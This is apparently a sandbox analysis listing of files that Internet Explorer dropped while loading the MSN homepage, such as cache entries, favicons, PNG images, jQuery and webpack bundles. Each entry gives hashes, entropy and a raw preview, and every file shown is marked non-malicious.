                                                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                Malicious:false
                                                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\MP98E46N\www.msn[1].xml

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):127
                                                                Entropy (8bit):4.936916038399468
                                                                Encrypted:false
                                                                SSDEEP:3:D9yRtFwsSxzqC+eAsOFETYHFk6YRmhJAqTUCfZKaKb:JUF+FqCqdFFYRpUkb
                                                                MD5:DACB549C576CC47323C10066AA00162E
                                                                SHA1:99C1E7789E6A81ACD94F7782F8A8307F96E02AAC
                                                                SHA-256:C02E4C56295FA7615B69128C0CC094D07750F926934F12EDDA3B751BCE7B82DD
                                                                SHA-512:DD1F3303032E7F7C21DCCDF178A51765FA33C31B327D5A2A2C06FA64752B196EFB62E62FE57C638EDB2A0A053D837C8B7FF55FDCC115B8833447C272AAB49E7B
                                                                Malicious:false
                                                                Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20241220.296&quot;}" ltime="2949094144" htime="31152986" /></root>

                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E68EA6F4-C74D-11EF-8F38-ECF4BBB5915B}.dat

                                                                Download File
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):2.053920544598572
                                                                Encrypted:false
                                                                SSDEEP:24:rewWGo/QByNgGW/1yNOyN8ZyN1NlWgK1NlWg:r2Go4ByKGW9yYySZyigKQg
                                                                MD5:3064CFFECA40DEF9B5608C0E522D22BF
                                                                SHA1:91A3520A316043C1F019FEB762DB299EF4D3809C
                                                                SHA-256:FC647EA756DE14F181054AE7F9B70435D52CD3242547CE8E6AE9845085E70BD6
                                                                SHA-512:B567BC9399F2CDA6D144268719D115B736DEC56DDC477BFD327E743CD6FA3511224067A3E47C43ED2A36A2D8A89DE99DA92B7ABAD5F1961978B6712FACF3826E
                                                                Malicious:false
                                                                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................X.Z[................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.9.a.a.O.5.k.3.H.7.x.G.P.O.O.z.0.u.7.W.R.W.w.=.=.........:.......................................

                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E68EA6F6-C74D-11EF-8F38-ECF4BBB5915B}.dat

                                                                Download File
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):2.2139276544593613
                                                                Encrypted:false
                                                                SSDEEP:24:rEGDdARHQNljFZyMuKvqy6yEyvy5DlsN5AcwNljFZyMXvqy:rEGpARAFZLuKS9LYu0O7FZLXS
                                                                MD5:BFCFFF68E5325944BDB31A678EF8EB80
                                                                SHA1:A90A83FA8A6ED0B91A6D4B744D26675DED381F4F
                                                                SHA-256:548113CB3CCB336AEA7179E4C7B97F8C0094809A1E829A93877B95959B170C6A
                                                                SHA-512:512024EBFFB363FCD51BE73CAE2D11CE14FC8C2850C44EE4C14840684C344B306C2F0905162BB0DA373C915AFED6F22616733DF20DE916A39D42DA8C9E6E0362
                                                                Malicious:false
                                                                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@..Z[................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\imagestore.dat

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):6006
                                                                Entropy (8bit):6.3542973412192145
                                                                Encrypted:false
                                                                SSDEEP:96:/zS29dcBUXqQVObIg0ZFY2q7UYWIzFhJFYo6syPYmSTZYVVQQT/VfygNV:/zSAcBKjg0jYh7TWqFpzTTGjT/Vfym
                                                                MD5:5602C5E0C99260FCAC3F99E850BC6A80
                                                                SHA1:3DC7BF03C5E8B8F3D8508FC588DF85FEC4F9C56D
                                                                SHA-256:0935F12421E0A71E26C0208268225253235A9C8FAA45DDEDD4C9C33730A6A9DE
                                                                SHA-512:CD3CA9A12740C63F5CF403F38365C1D8D166735220F7E1587B53C93118FECA4CEF3E273B86110720B97F210F1785B41559B6C9DC632BA4C83E14A890A072492A
                                                                Malicious:false
                                                                Preview:........D.h.t.t.p.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............._......._....D.h.t.t.p.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Icon[1].png

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):533
                                                                Entropy (8bit):7.415663553371965
                                                                Encrypted:false
                                                                SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                                                MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                                                SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                                                SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                                                SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                                                Malicious:false
                                                                Preview:.PNG........IHDR...<... .....N.......pHYs.................sRGB.........gAMA......a.....IDATx..=O.1....$....1..7.....p32..)..Yw..p..IL.$qT'......1.#.h..j.5...9...~...w.....oe.....]8,..|..........``.$a.K.&Lq........D,D..8e.c.....fQ...u..%.(..b..8A......,>@6....Y*...9.(...d7........,!zr.N...T}.....j...NY'..|.=N2Q&<?3....@..-.e.h....F#..2.v...n..!-.e..&........%.e........y.c.y,.e........4'40.t"...B.........D.../[D..6j....^>.....g...3...5<Hv.H../M.+Y`.......OXw<a.al..aF.@.../.E....=;S.K....s.......IEND.B`.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\YJ1BHFNR.htm

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:HTML document, ASCII text, with very long lines (58335), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):193378
                                                                Entropy (8bit):5.451282730098038
                                                                Encrypted:false
                                                                SSDEEP:3072:DZRDgfyd5FO93Qiq6I8khsNyh/P9OZ8TixYE:zgfyA93Qx6I8hNyhX91OxYE
                                                                MD5:C1DD7EB29B861DE41A3735EF212AE152
                                                                SHA1:CE30E5303ED8B78E3CB42573496DA9DB72F9BCBE
                                                                SHA-256:73768C4FB5E903A294A48B9713790FD3ECD8C025B444590E76C235FB42DDCE37
                                                                SHA-512:ED5058F68F69CE4BA79FC87944C65845914EEF8297AF122889E4ECC91E1FC510E37D7A8A92F5AFAF396EFAED5513987FCFB7632B11BB9E1EC16E2EA6AE89362C
                                                                Malicious:false
                                                                Preview:<!DOCTYPE html>..<html lang="en-us" dir="ltr" >..<head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,pnpwxexpire-c,bing_v2_scope,prg-cg-crosaloc1,prg-adspeek,prg-pr2-widget-tab,prg-pr2-marketsel-c,routeugcexp,1s-fcrypt,prg-wpo-pnpc,1s-ntf2-evlcfc,1s-ntf2-bknlc,1s-ntf2-iptlc,1s-pr2-evlc,1s-pr2-evlcbb,1s-pr2-evlch,1s-pr2-evlcn,1s-pr2-evlcrp,1s-pr2-evlct,1s-prg2-lifecycle,1s-wpo-pr2-ncard,1s-wpo-pr2-pnpfilter,1s-wpo-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_t,prg-pr2-pred-dyf,chatn_v2_t2,prg-pr1-uc-no-store-t,1s-p1-promotedondmd,1s-p1-ua4osvhw,1s-wpo-pr1-promad,prg-1unified-no-store,2412-i-ncnf-t,1s-notifmapping,1s-shp-rc-t-decu1,1s-shp-rc-ta-dctime,1s-shp-rc-ta-decay,1s-shp-rc-ta-decu1,1s-shp-rc-ta-initw,1s-shp-rc-ta-lam01,1s-shp-rc-ta-min1,1s-shp-rc-ta-min4,prg-sh-frnrc,prg-wx-dhgrd,prg-sh-de

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\common.802715d7a736bd82fc74[1].js

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):265561
                                                                Entropy (8bit):5.432386621514022
                                                                Encrypted:false
                                                                SSDEEP:3072:Hw+voYPbYRFKstM4weHKyhqGF0/UnwQXXiR4U2JH5:HLvoMKkstM4wBVUnjJZ
                                                                MD5:1C984AC84FC70C69942DF2AD7CD7933E
                                                                SHA1:61A5C268E80AF49D161ADD6B6EE0DB6FC02EB6EA
                                                                SHA-256:8D7E6CE8CC3594239246D481140C43546A2058B5B75DCA2048389C3713B9FE15
                                                                SHA-512:1B19BC2DC7CDFD89A5657D0BDB9D9E63F6396994426780241E2F5F7669ECCFE4102814593A0E15170349F7340062D29AD8750B4B5DA43E63D624E3BA64F2FE98
                                                                Malicious:false
                                                                Preview:"use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["common"],{54085:function(e,t,n){var r;n.d(t,{p:function(){return r}}),function(e){e.Desktop="desktop",e.Phone="phone",e.Tablet="tablet"}(r||(r={}))},21290:function(e,t,n){n.d(t,{GB:function(){return s},Km:function(){return c},Oq:function(){return f},Sp:function(){return d},Wc:function(){return u},cm:function(){return p},e_:function(){return g},oH:function(){return h},r7:function(){return a},yL:function(){return l}});var r=n(45331),i=r.z.Alert,o={build:""};function a(e){Object.assign(o,e)}var s={id:22012,severity:i,pb:o},c={id:22014,severity:r.z.Critical,pb:o},u=(r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,r.z.Deprecated,{id:22027,severity:r.z.Critical,pb:o}),l=(r.z.Critical,r.z.Critical,{id:22031,severity:i,pb:o}),p={id:22032,severity:i,pb:o},d={id:22033,severity:i,pb:o},f={id:22034,severity:i,pb:o},h={id:22050,severity:i,pb:o},g={id:22051,severity:r.z.Deprecated,pb:o};r.z.De

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\experience.b374b0d5b40196862f17[1].js

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (62058), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):231602
                                                                Entropy (8bit):5.762554862752807
                                                                Encrypted:false
                                                                SSDEEP:1536:Bl4m9Uoyafb1Hjhw3dsrWnQHdiJg7hJ5BjNnaAyGJNyWVzskeUjlWSGu9bCxKYb1:Mm9r0g9KAvyWs7Gb9+Fb1Zzae
                                                                MD5:3ACCB914F415F2E2C36775D5783CF112
                                                                SHA1:7CB1F2677020EAFEAF7BFCCF2E15BC7DC45DC758
                                                                SHA-256:D3722105B5C0D92A3E85ECA10174193CD0AF84DE74586B2EEE991182CFF5AFFE
                                                                SHA-512:3024450B40BBF7F3482F465BC831E4826543DE5D6A634584AAE7C5EA4B72D8F6E75A675D9371BF92303E051BFF94ACE431A082D8BD5E89CB664FC0DEF41DB19B
                                                                Malicious:false
                                                                Preview:!function(){"use strict";var t,e,n,r={12451:function(t,e,n){var r=n(8460),i=n(2132),a=n(82589),o=n(9925),s=n(96838),c=n(56595),l=n(54616),d=n(82512),u=n(3290),f=n(8488),p=n(4577),m=n(4108),g=n(23159),h=n(65212),v=n(27310),b=n(54085),x=n(29714),y=n(3460),w=n(91898),k=n(42390),C=function(){function t(){}return Object.defineProperty(t,"viewType",{get:function(){return x.Gq.get(this.viewTypeKey)},set:function(t){x.Gq.set(this.viewTypeKey,t)},enumerable:!1,configurable:!0}),t.trackCallbacks=function(){switch((0,y.Bn)().currentColumnArrangement){case w.K$.c1:case w.K$.c2:t.viewType="size2column";break;case w.K$.c3:t.viewType="size3column";break;case w.K$.c4:t.viewType="size4column"}return t.viewType},t.getTelemetryProperties=function(t,e){var n=!("false"===k.c.getQueryParameterByName("enableTrack",e)),r=k.c.getQueryParameterByName("ocid",e)||"hpmsn",i=u.jG.ActivityIdLowerCaseNoHypens,a="0",o=!1;if(d.Al&&d.Al.ClientSettings){var s=d.Al.ClientSettings;"true"===s.static_page&&(o=!0),a=s.browser

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microsoft.b109cceab5e009228460[1].js

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with very long lines (65448)
                                                                Category:dropped
                                                                Size (bytes):94707
                                                                Entropy (8bit):5.407635683386335
                                                                Encrypted:false
                                                                SSDEEP:768:GSqLAEwLuZAFL1oL3SDk5v1VWkNWPEYydLLnnS+7ySGAEMbiYnRGwVKVt+RFVDh4:GJMCUCuW3WkNtnnDGgGwVKWklyGEQ
                                                                MD5:AA2BEDDF57312EF1CD312880E2729EBA
                                                                SHA1:8E53B59585F8C947924355AFDC72A62E27CD001C
                                                                SHA-256:16933DCF75634F75F0A09A67FB0FF7D9D0556188A888CDD89E05F2D21997BB51
                                                                SHA-512:64AC2CCE15619DA127C5F1B637BBB39C1EB3DB69DE30FB690863C7390EC0A6D0BA2BEE9B9BC20DFF2B4044D17CED483CE5294E624F792652E8E4E1AD6FFAD4DD
                                                                Malicious:false
                                                                Preview:/*! For license information please see microsoft.b109cceab5e009228460.js.LICENSE.txt */."use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["microsoft"],{39115:function(n,e,t){t.d(e,{Z:function(){return M}});var r=t(68897),i=t(44611),o=t(89734),u=t(98693),a=t(38629),c=t(64648),f=t(73966),s=t(64973),l=t(26105),d=t(46540),v=500,p="Channel has invalid priority - ";function g(n,e,t){e&&(0,f.kJ)(e)&&e[c.R5]>0&&(e=e.sort((function(n,e){return n[s.yi]-e[s.yi]})),(0,f.tO)(e,(function(n){n[s.yi]<v&&(0,f._y)(p+n[c.pZ])})),n[c.MW]({queue:(0,f.FL)(e),chain:(0,l.jV)(e,t[c.TC],t)}))}var h=t(27218),m=t(24200),y=t(92687),b=t(28055),S=function(n){function e(){var t,r,a=n.call(this)||this;function l(){t=0,r=[]}return a.identifier="TelemetryInitializerPlugin",a.priority=199,l(),(0,i.Z)(e,a,(function(n,e){n.addTelemetryInitializer=function(n){var e={id:t++,fn:n};return r[c.MW](e),{remove:function(){(0,f.tO)(r,(function(n,t){if(n.id===e.id)return r[c.cb](t,1),-1}))}}},n[s.hL]=fu

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vendors.290823e0e7160e8e5303[1].js

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (44387), with NEL line terminators
                                                                Category:dropped
                                                                Size (bytes):194844
                                                                Entropy (8bit):5.419132326845799
                                                                Encrypted:false
                                                                SSDEEP:3072:oSYgu0Mj/PJ3floxEsQtzbwDZ777/3DwLps0p:oSYguVJvSa5+Z7uOE
                                                                MD5:1C8B7CFD513B7ECA52BA64947CEE70E4
                                                                SHA1:6BA3FBE2E7514E981EB68E9A92E9EA7A499CCC0C
                                                                SHA-256:D1730E14E7E3D2362E6C5FF0C9C36E08660F87317EC44551FAED419263240F2C
                                                                SHA-512:1F6567D3870CFBE002CD447135020C9F1319DFAB76E3CEAFE4C62BDD79F78F2AB3E5958DE9E068A3937E1C469978FC2E4A56015B82E06FE1377A78B47D1B06DC
                                                                Malicious:false
                                                                Preview:"use strict";(self.homePageWebpackChunks=self.homePageWebpackChunks||[]).push([["vendors"],{29558:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},74322:function(t){t.exports=function(t){if("function"!=typeof t)throw TypeError(String(t)+" is not a function");return t}},25135:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t)&&null!==t)throw TypeError("Can't set "+String(t)+" as a prototype");return t}},6664:function(t,e,r){var n=r(23362),o=r(35093),i=r(79549),a=n("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},99027:function(t,e,r){var n=r(58306).charAt;t.exports=function(t,e,r){return e+(r?n(t,e).length:1)}},57699:function(t){t.exports=function(t,e,r){if(!(t instanceof e))throw TypeError("Incorrect "+(r?r+" ":"")+"invocation");return t}},45150:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t))throw TypeError(String(t)+" is not an object");return t}},60410:function(t){t.exports=

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[1].ico

                                                                Download File
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4286
                                                                Entropy (8bit):3.8046022951415335
                                                                Encrypted:false
                                                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                Malicious:false
                                                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[2].ico

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4286
                                                                Entropy (8bit):5.912342955561912
                                                                Encrypted:false
                                                                SSDEEP:96:YY2q7UYWIzFhJFYo6syPYmSTZYVVQQT/VfygN6:YYh7TWqFpzTTGjT/VfyZ
                                                                MD5:A73B8189E32D3A97AE2FBF1A57931D49
                                                                SHA1:560A8EA628A89A82233BF4288166B54789242966
                                                                SHA-256:855F6B5EEA22A22F5F4ABCCEEED4B8969EFB3A99443036EB5EB64F5F46C8FD8E
                                                                SHA-512:2B016E28A7E63DE8FCAD90DDB38CCD5D875A22CF53D723E055B7C7C9B7589CB818883234C6682CA25112AF3CB4BA61A1AED384C1638C04905FC6FAFDD37F79A4
                                                                Malicious:false
                                                                Preview:...... .... .........(... ...@..... .................................G..."...?..<2...)...'...-...8..uD...@...8...............2...2...1...1...2...4...7...6.......................................T...Q...S..*J...@...9...7...:...B...K...U.|/G...[.r.....C...=...?..c@...D...E...D...D..{]...H...................................i.a.:...].p.U.{.N...H...F...H...L...S.~.\.q.f.c4`.h...g.R...O...P...S...V...V...U...S...S.. T...................................m.V.o.R.i.^.a.j.Z.u.T.}.R...S...V.z.\.q.e.e.l.V.i.E j.H.Y...Y...Z...Z...Z...Z...Z...Y...Y..KY...................................g.E.e.A.j.K.k.X.f.c.`.k.^.o.^.n.a.j.f.c.l.X.h.H.[.5.E...U...[...[...[...Z...Z...Z...Z...Z..cZ...................................Z.5.N.(.[.6.d.B.k.P.k.X.j.].j.].k.Z.m.S.h.H.\.7.M.$.@..SK.8.]...Z...[...[...[...[...[...[..d[...................................M.&.L.#.L.#YR.*.].7.d.B.h.H.j.I.h.G.c.?.Z.4.N.%.?...=...}h....}.yb.\y..Z...[...[...[...[..Q[.......................................A...@...B...I...Q.(.V./.X.1.V.0.Q.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\jquery-3.6.3.min[1].js

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89947
                                                                Entropy (8bit):5.290839266829335
                                                                Encrypted:false
                                                                SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                                                MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                                                SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                                                SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                                                SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                                                Malicious:false
                                                                Preview:/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\desktop-shape[1].png

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):197
                                                                Entropy (8bit):5.986656121330302
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                                                MD5:34760615AB0C180EB4B48739297FD0F2
                                                                SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                                                SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                                                SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                                                Malicious:false
                                                                Preview:.PNG........IHDR.............e.t.....pHYs.................sRGB.........gAMA......a....ZIDATx......@.EA.`...U..1\.......X]...G..{..HU.4Uj.`..O .3;..\..!3...q....[s./.@@..p...>.`(k..2.....IEND.B`.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ie-image[1].png

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:PNG image data, 1260 x 293, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):39155
                                                                Entropy (8bit):7.8985187905985486
                                                                Encrypted:false
                                                                SSDEEP:768:c3+SnZXFurjYW0X0RJ/Dd18i72A/qcQ6Nj2CG+CiTZ2co4IXnmDt:DSnZXFuPSX0f837cQnCG+3WZXmx
                                                                MD5:E161E2045A32E4513E81954B1D83B953
                                                                SHA1:0A06306203C286B8C342CFD856C1EE3F16728C7E
                                                                SHA-256:7A344D69BC6657592E6041F0ED4F53F56ABA90B97EBD94559198B1D059DC7F64
                                                                SHA-512:7C7E5C2D2A0DF749BB4B52F2E8042829AE8ADD4F242674E13C14FEC436E56D7B173318D8408DD5A33462D38BC1FD2AD932B2060994B5A0C46F4B4BA89922437F
                                                                Malicious:false
                                                                Preview:.PNG........IHDR.......%.....W.}^....pHYs.................sRGB.........gAMA......a.....IDATx.....diz..}.c._..W.7..Nc\..,@...]I w..")..DI+.!.6......A?2......pI`....{.........&.9...s2o...2Y5..0;.I{O..|.<.#...?. """""""".............&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........&..;"""""""".............h.0.#"""""""". .........

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\logo[1].png

                                                                Download File
                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                File Type:PNG image data, 1633 x 708, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):27928
                                                                Entropy (8bit):7.701164569435742
                                                                Encrypted:false
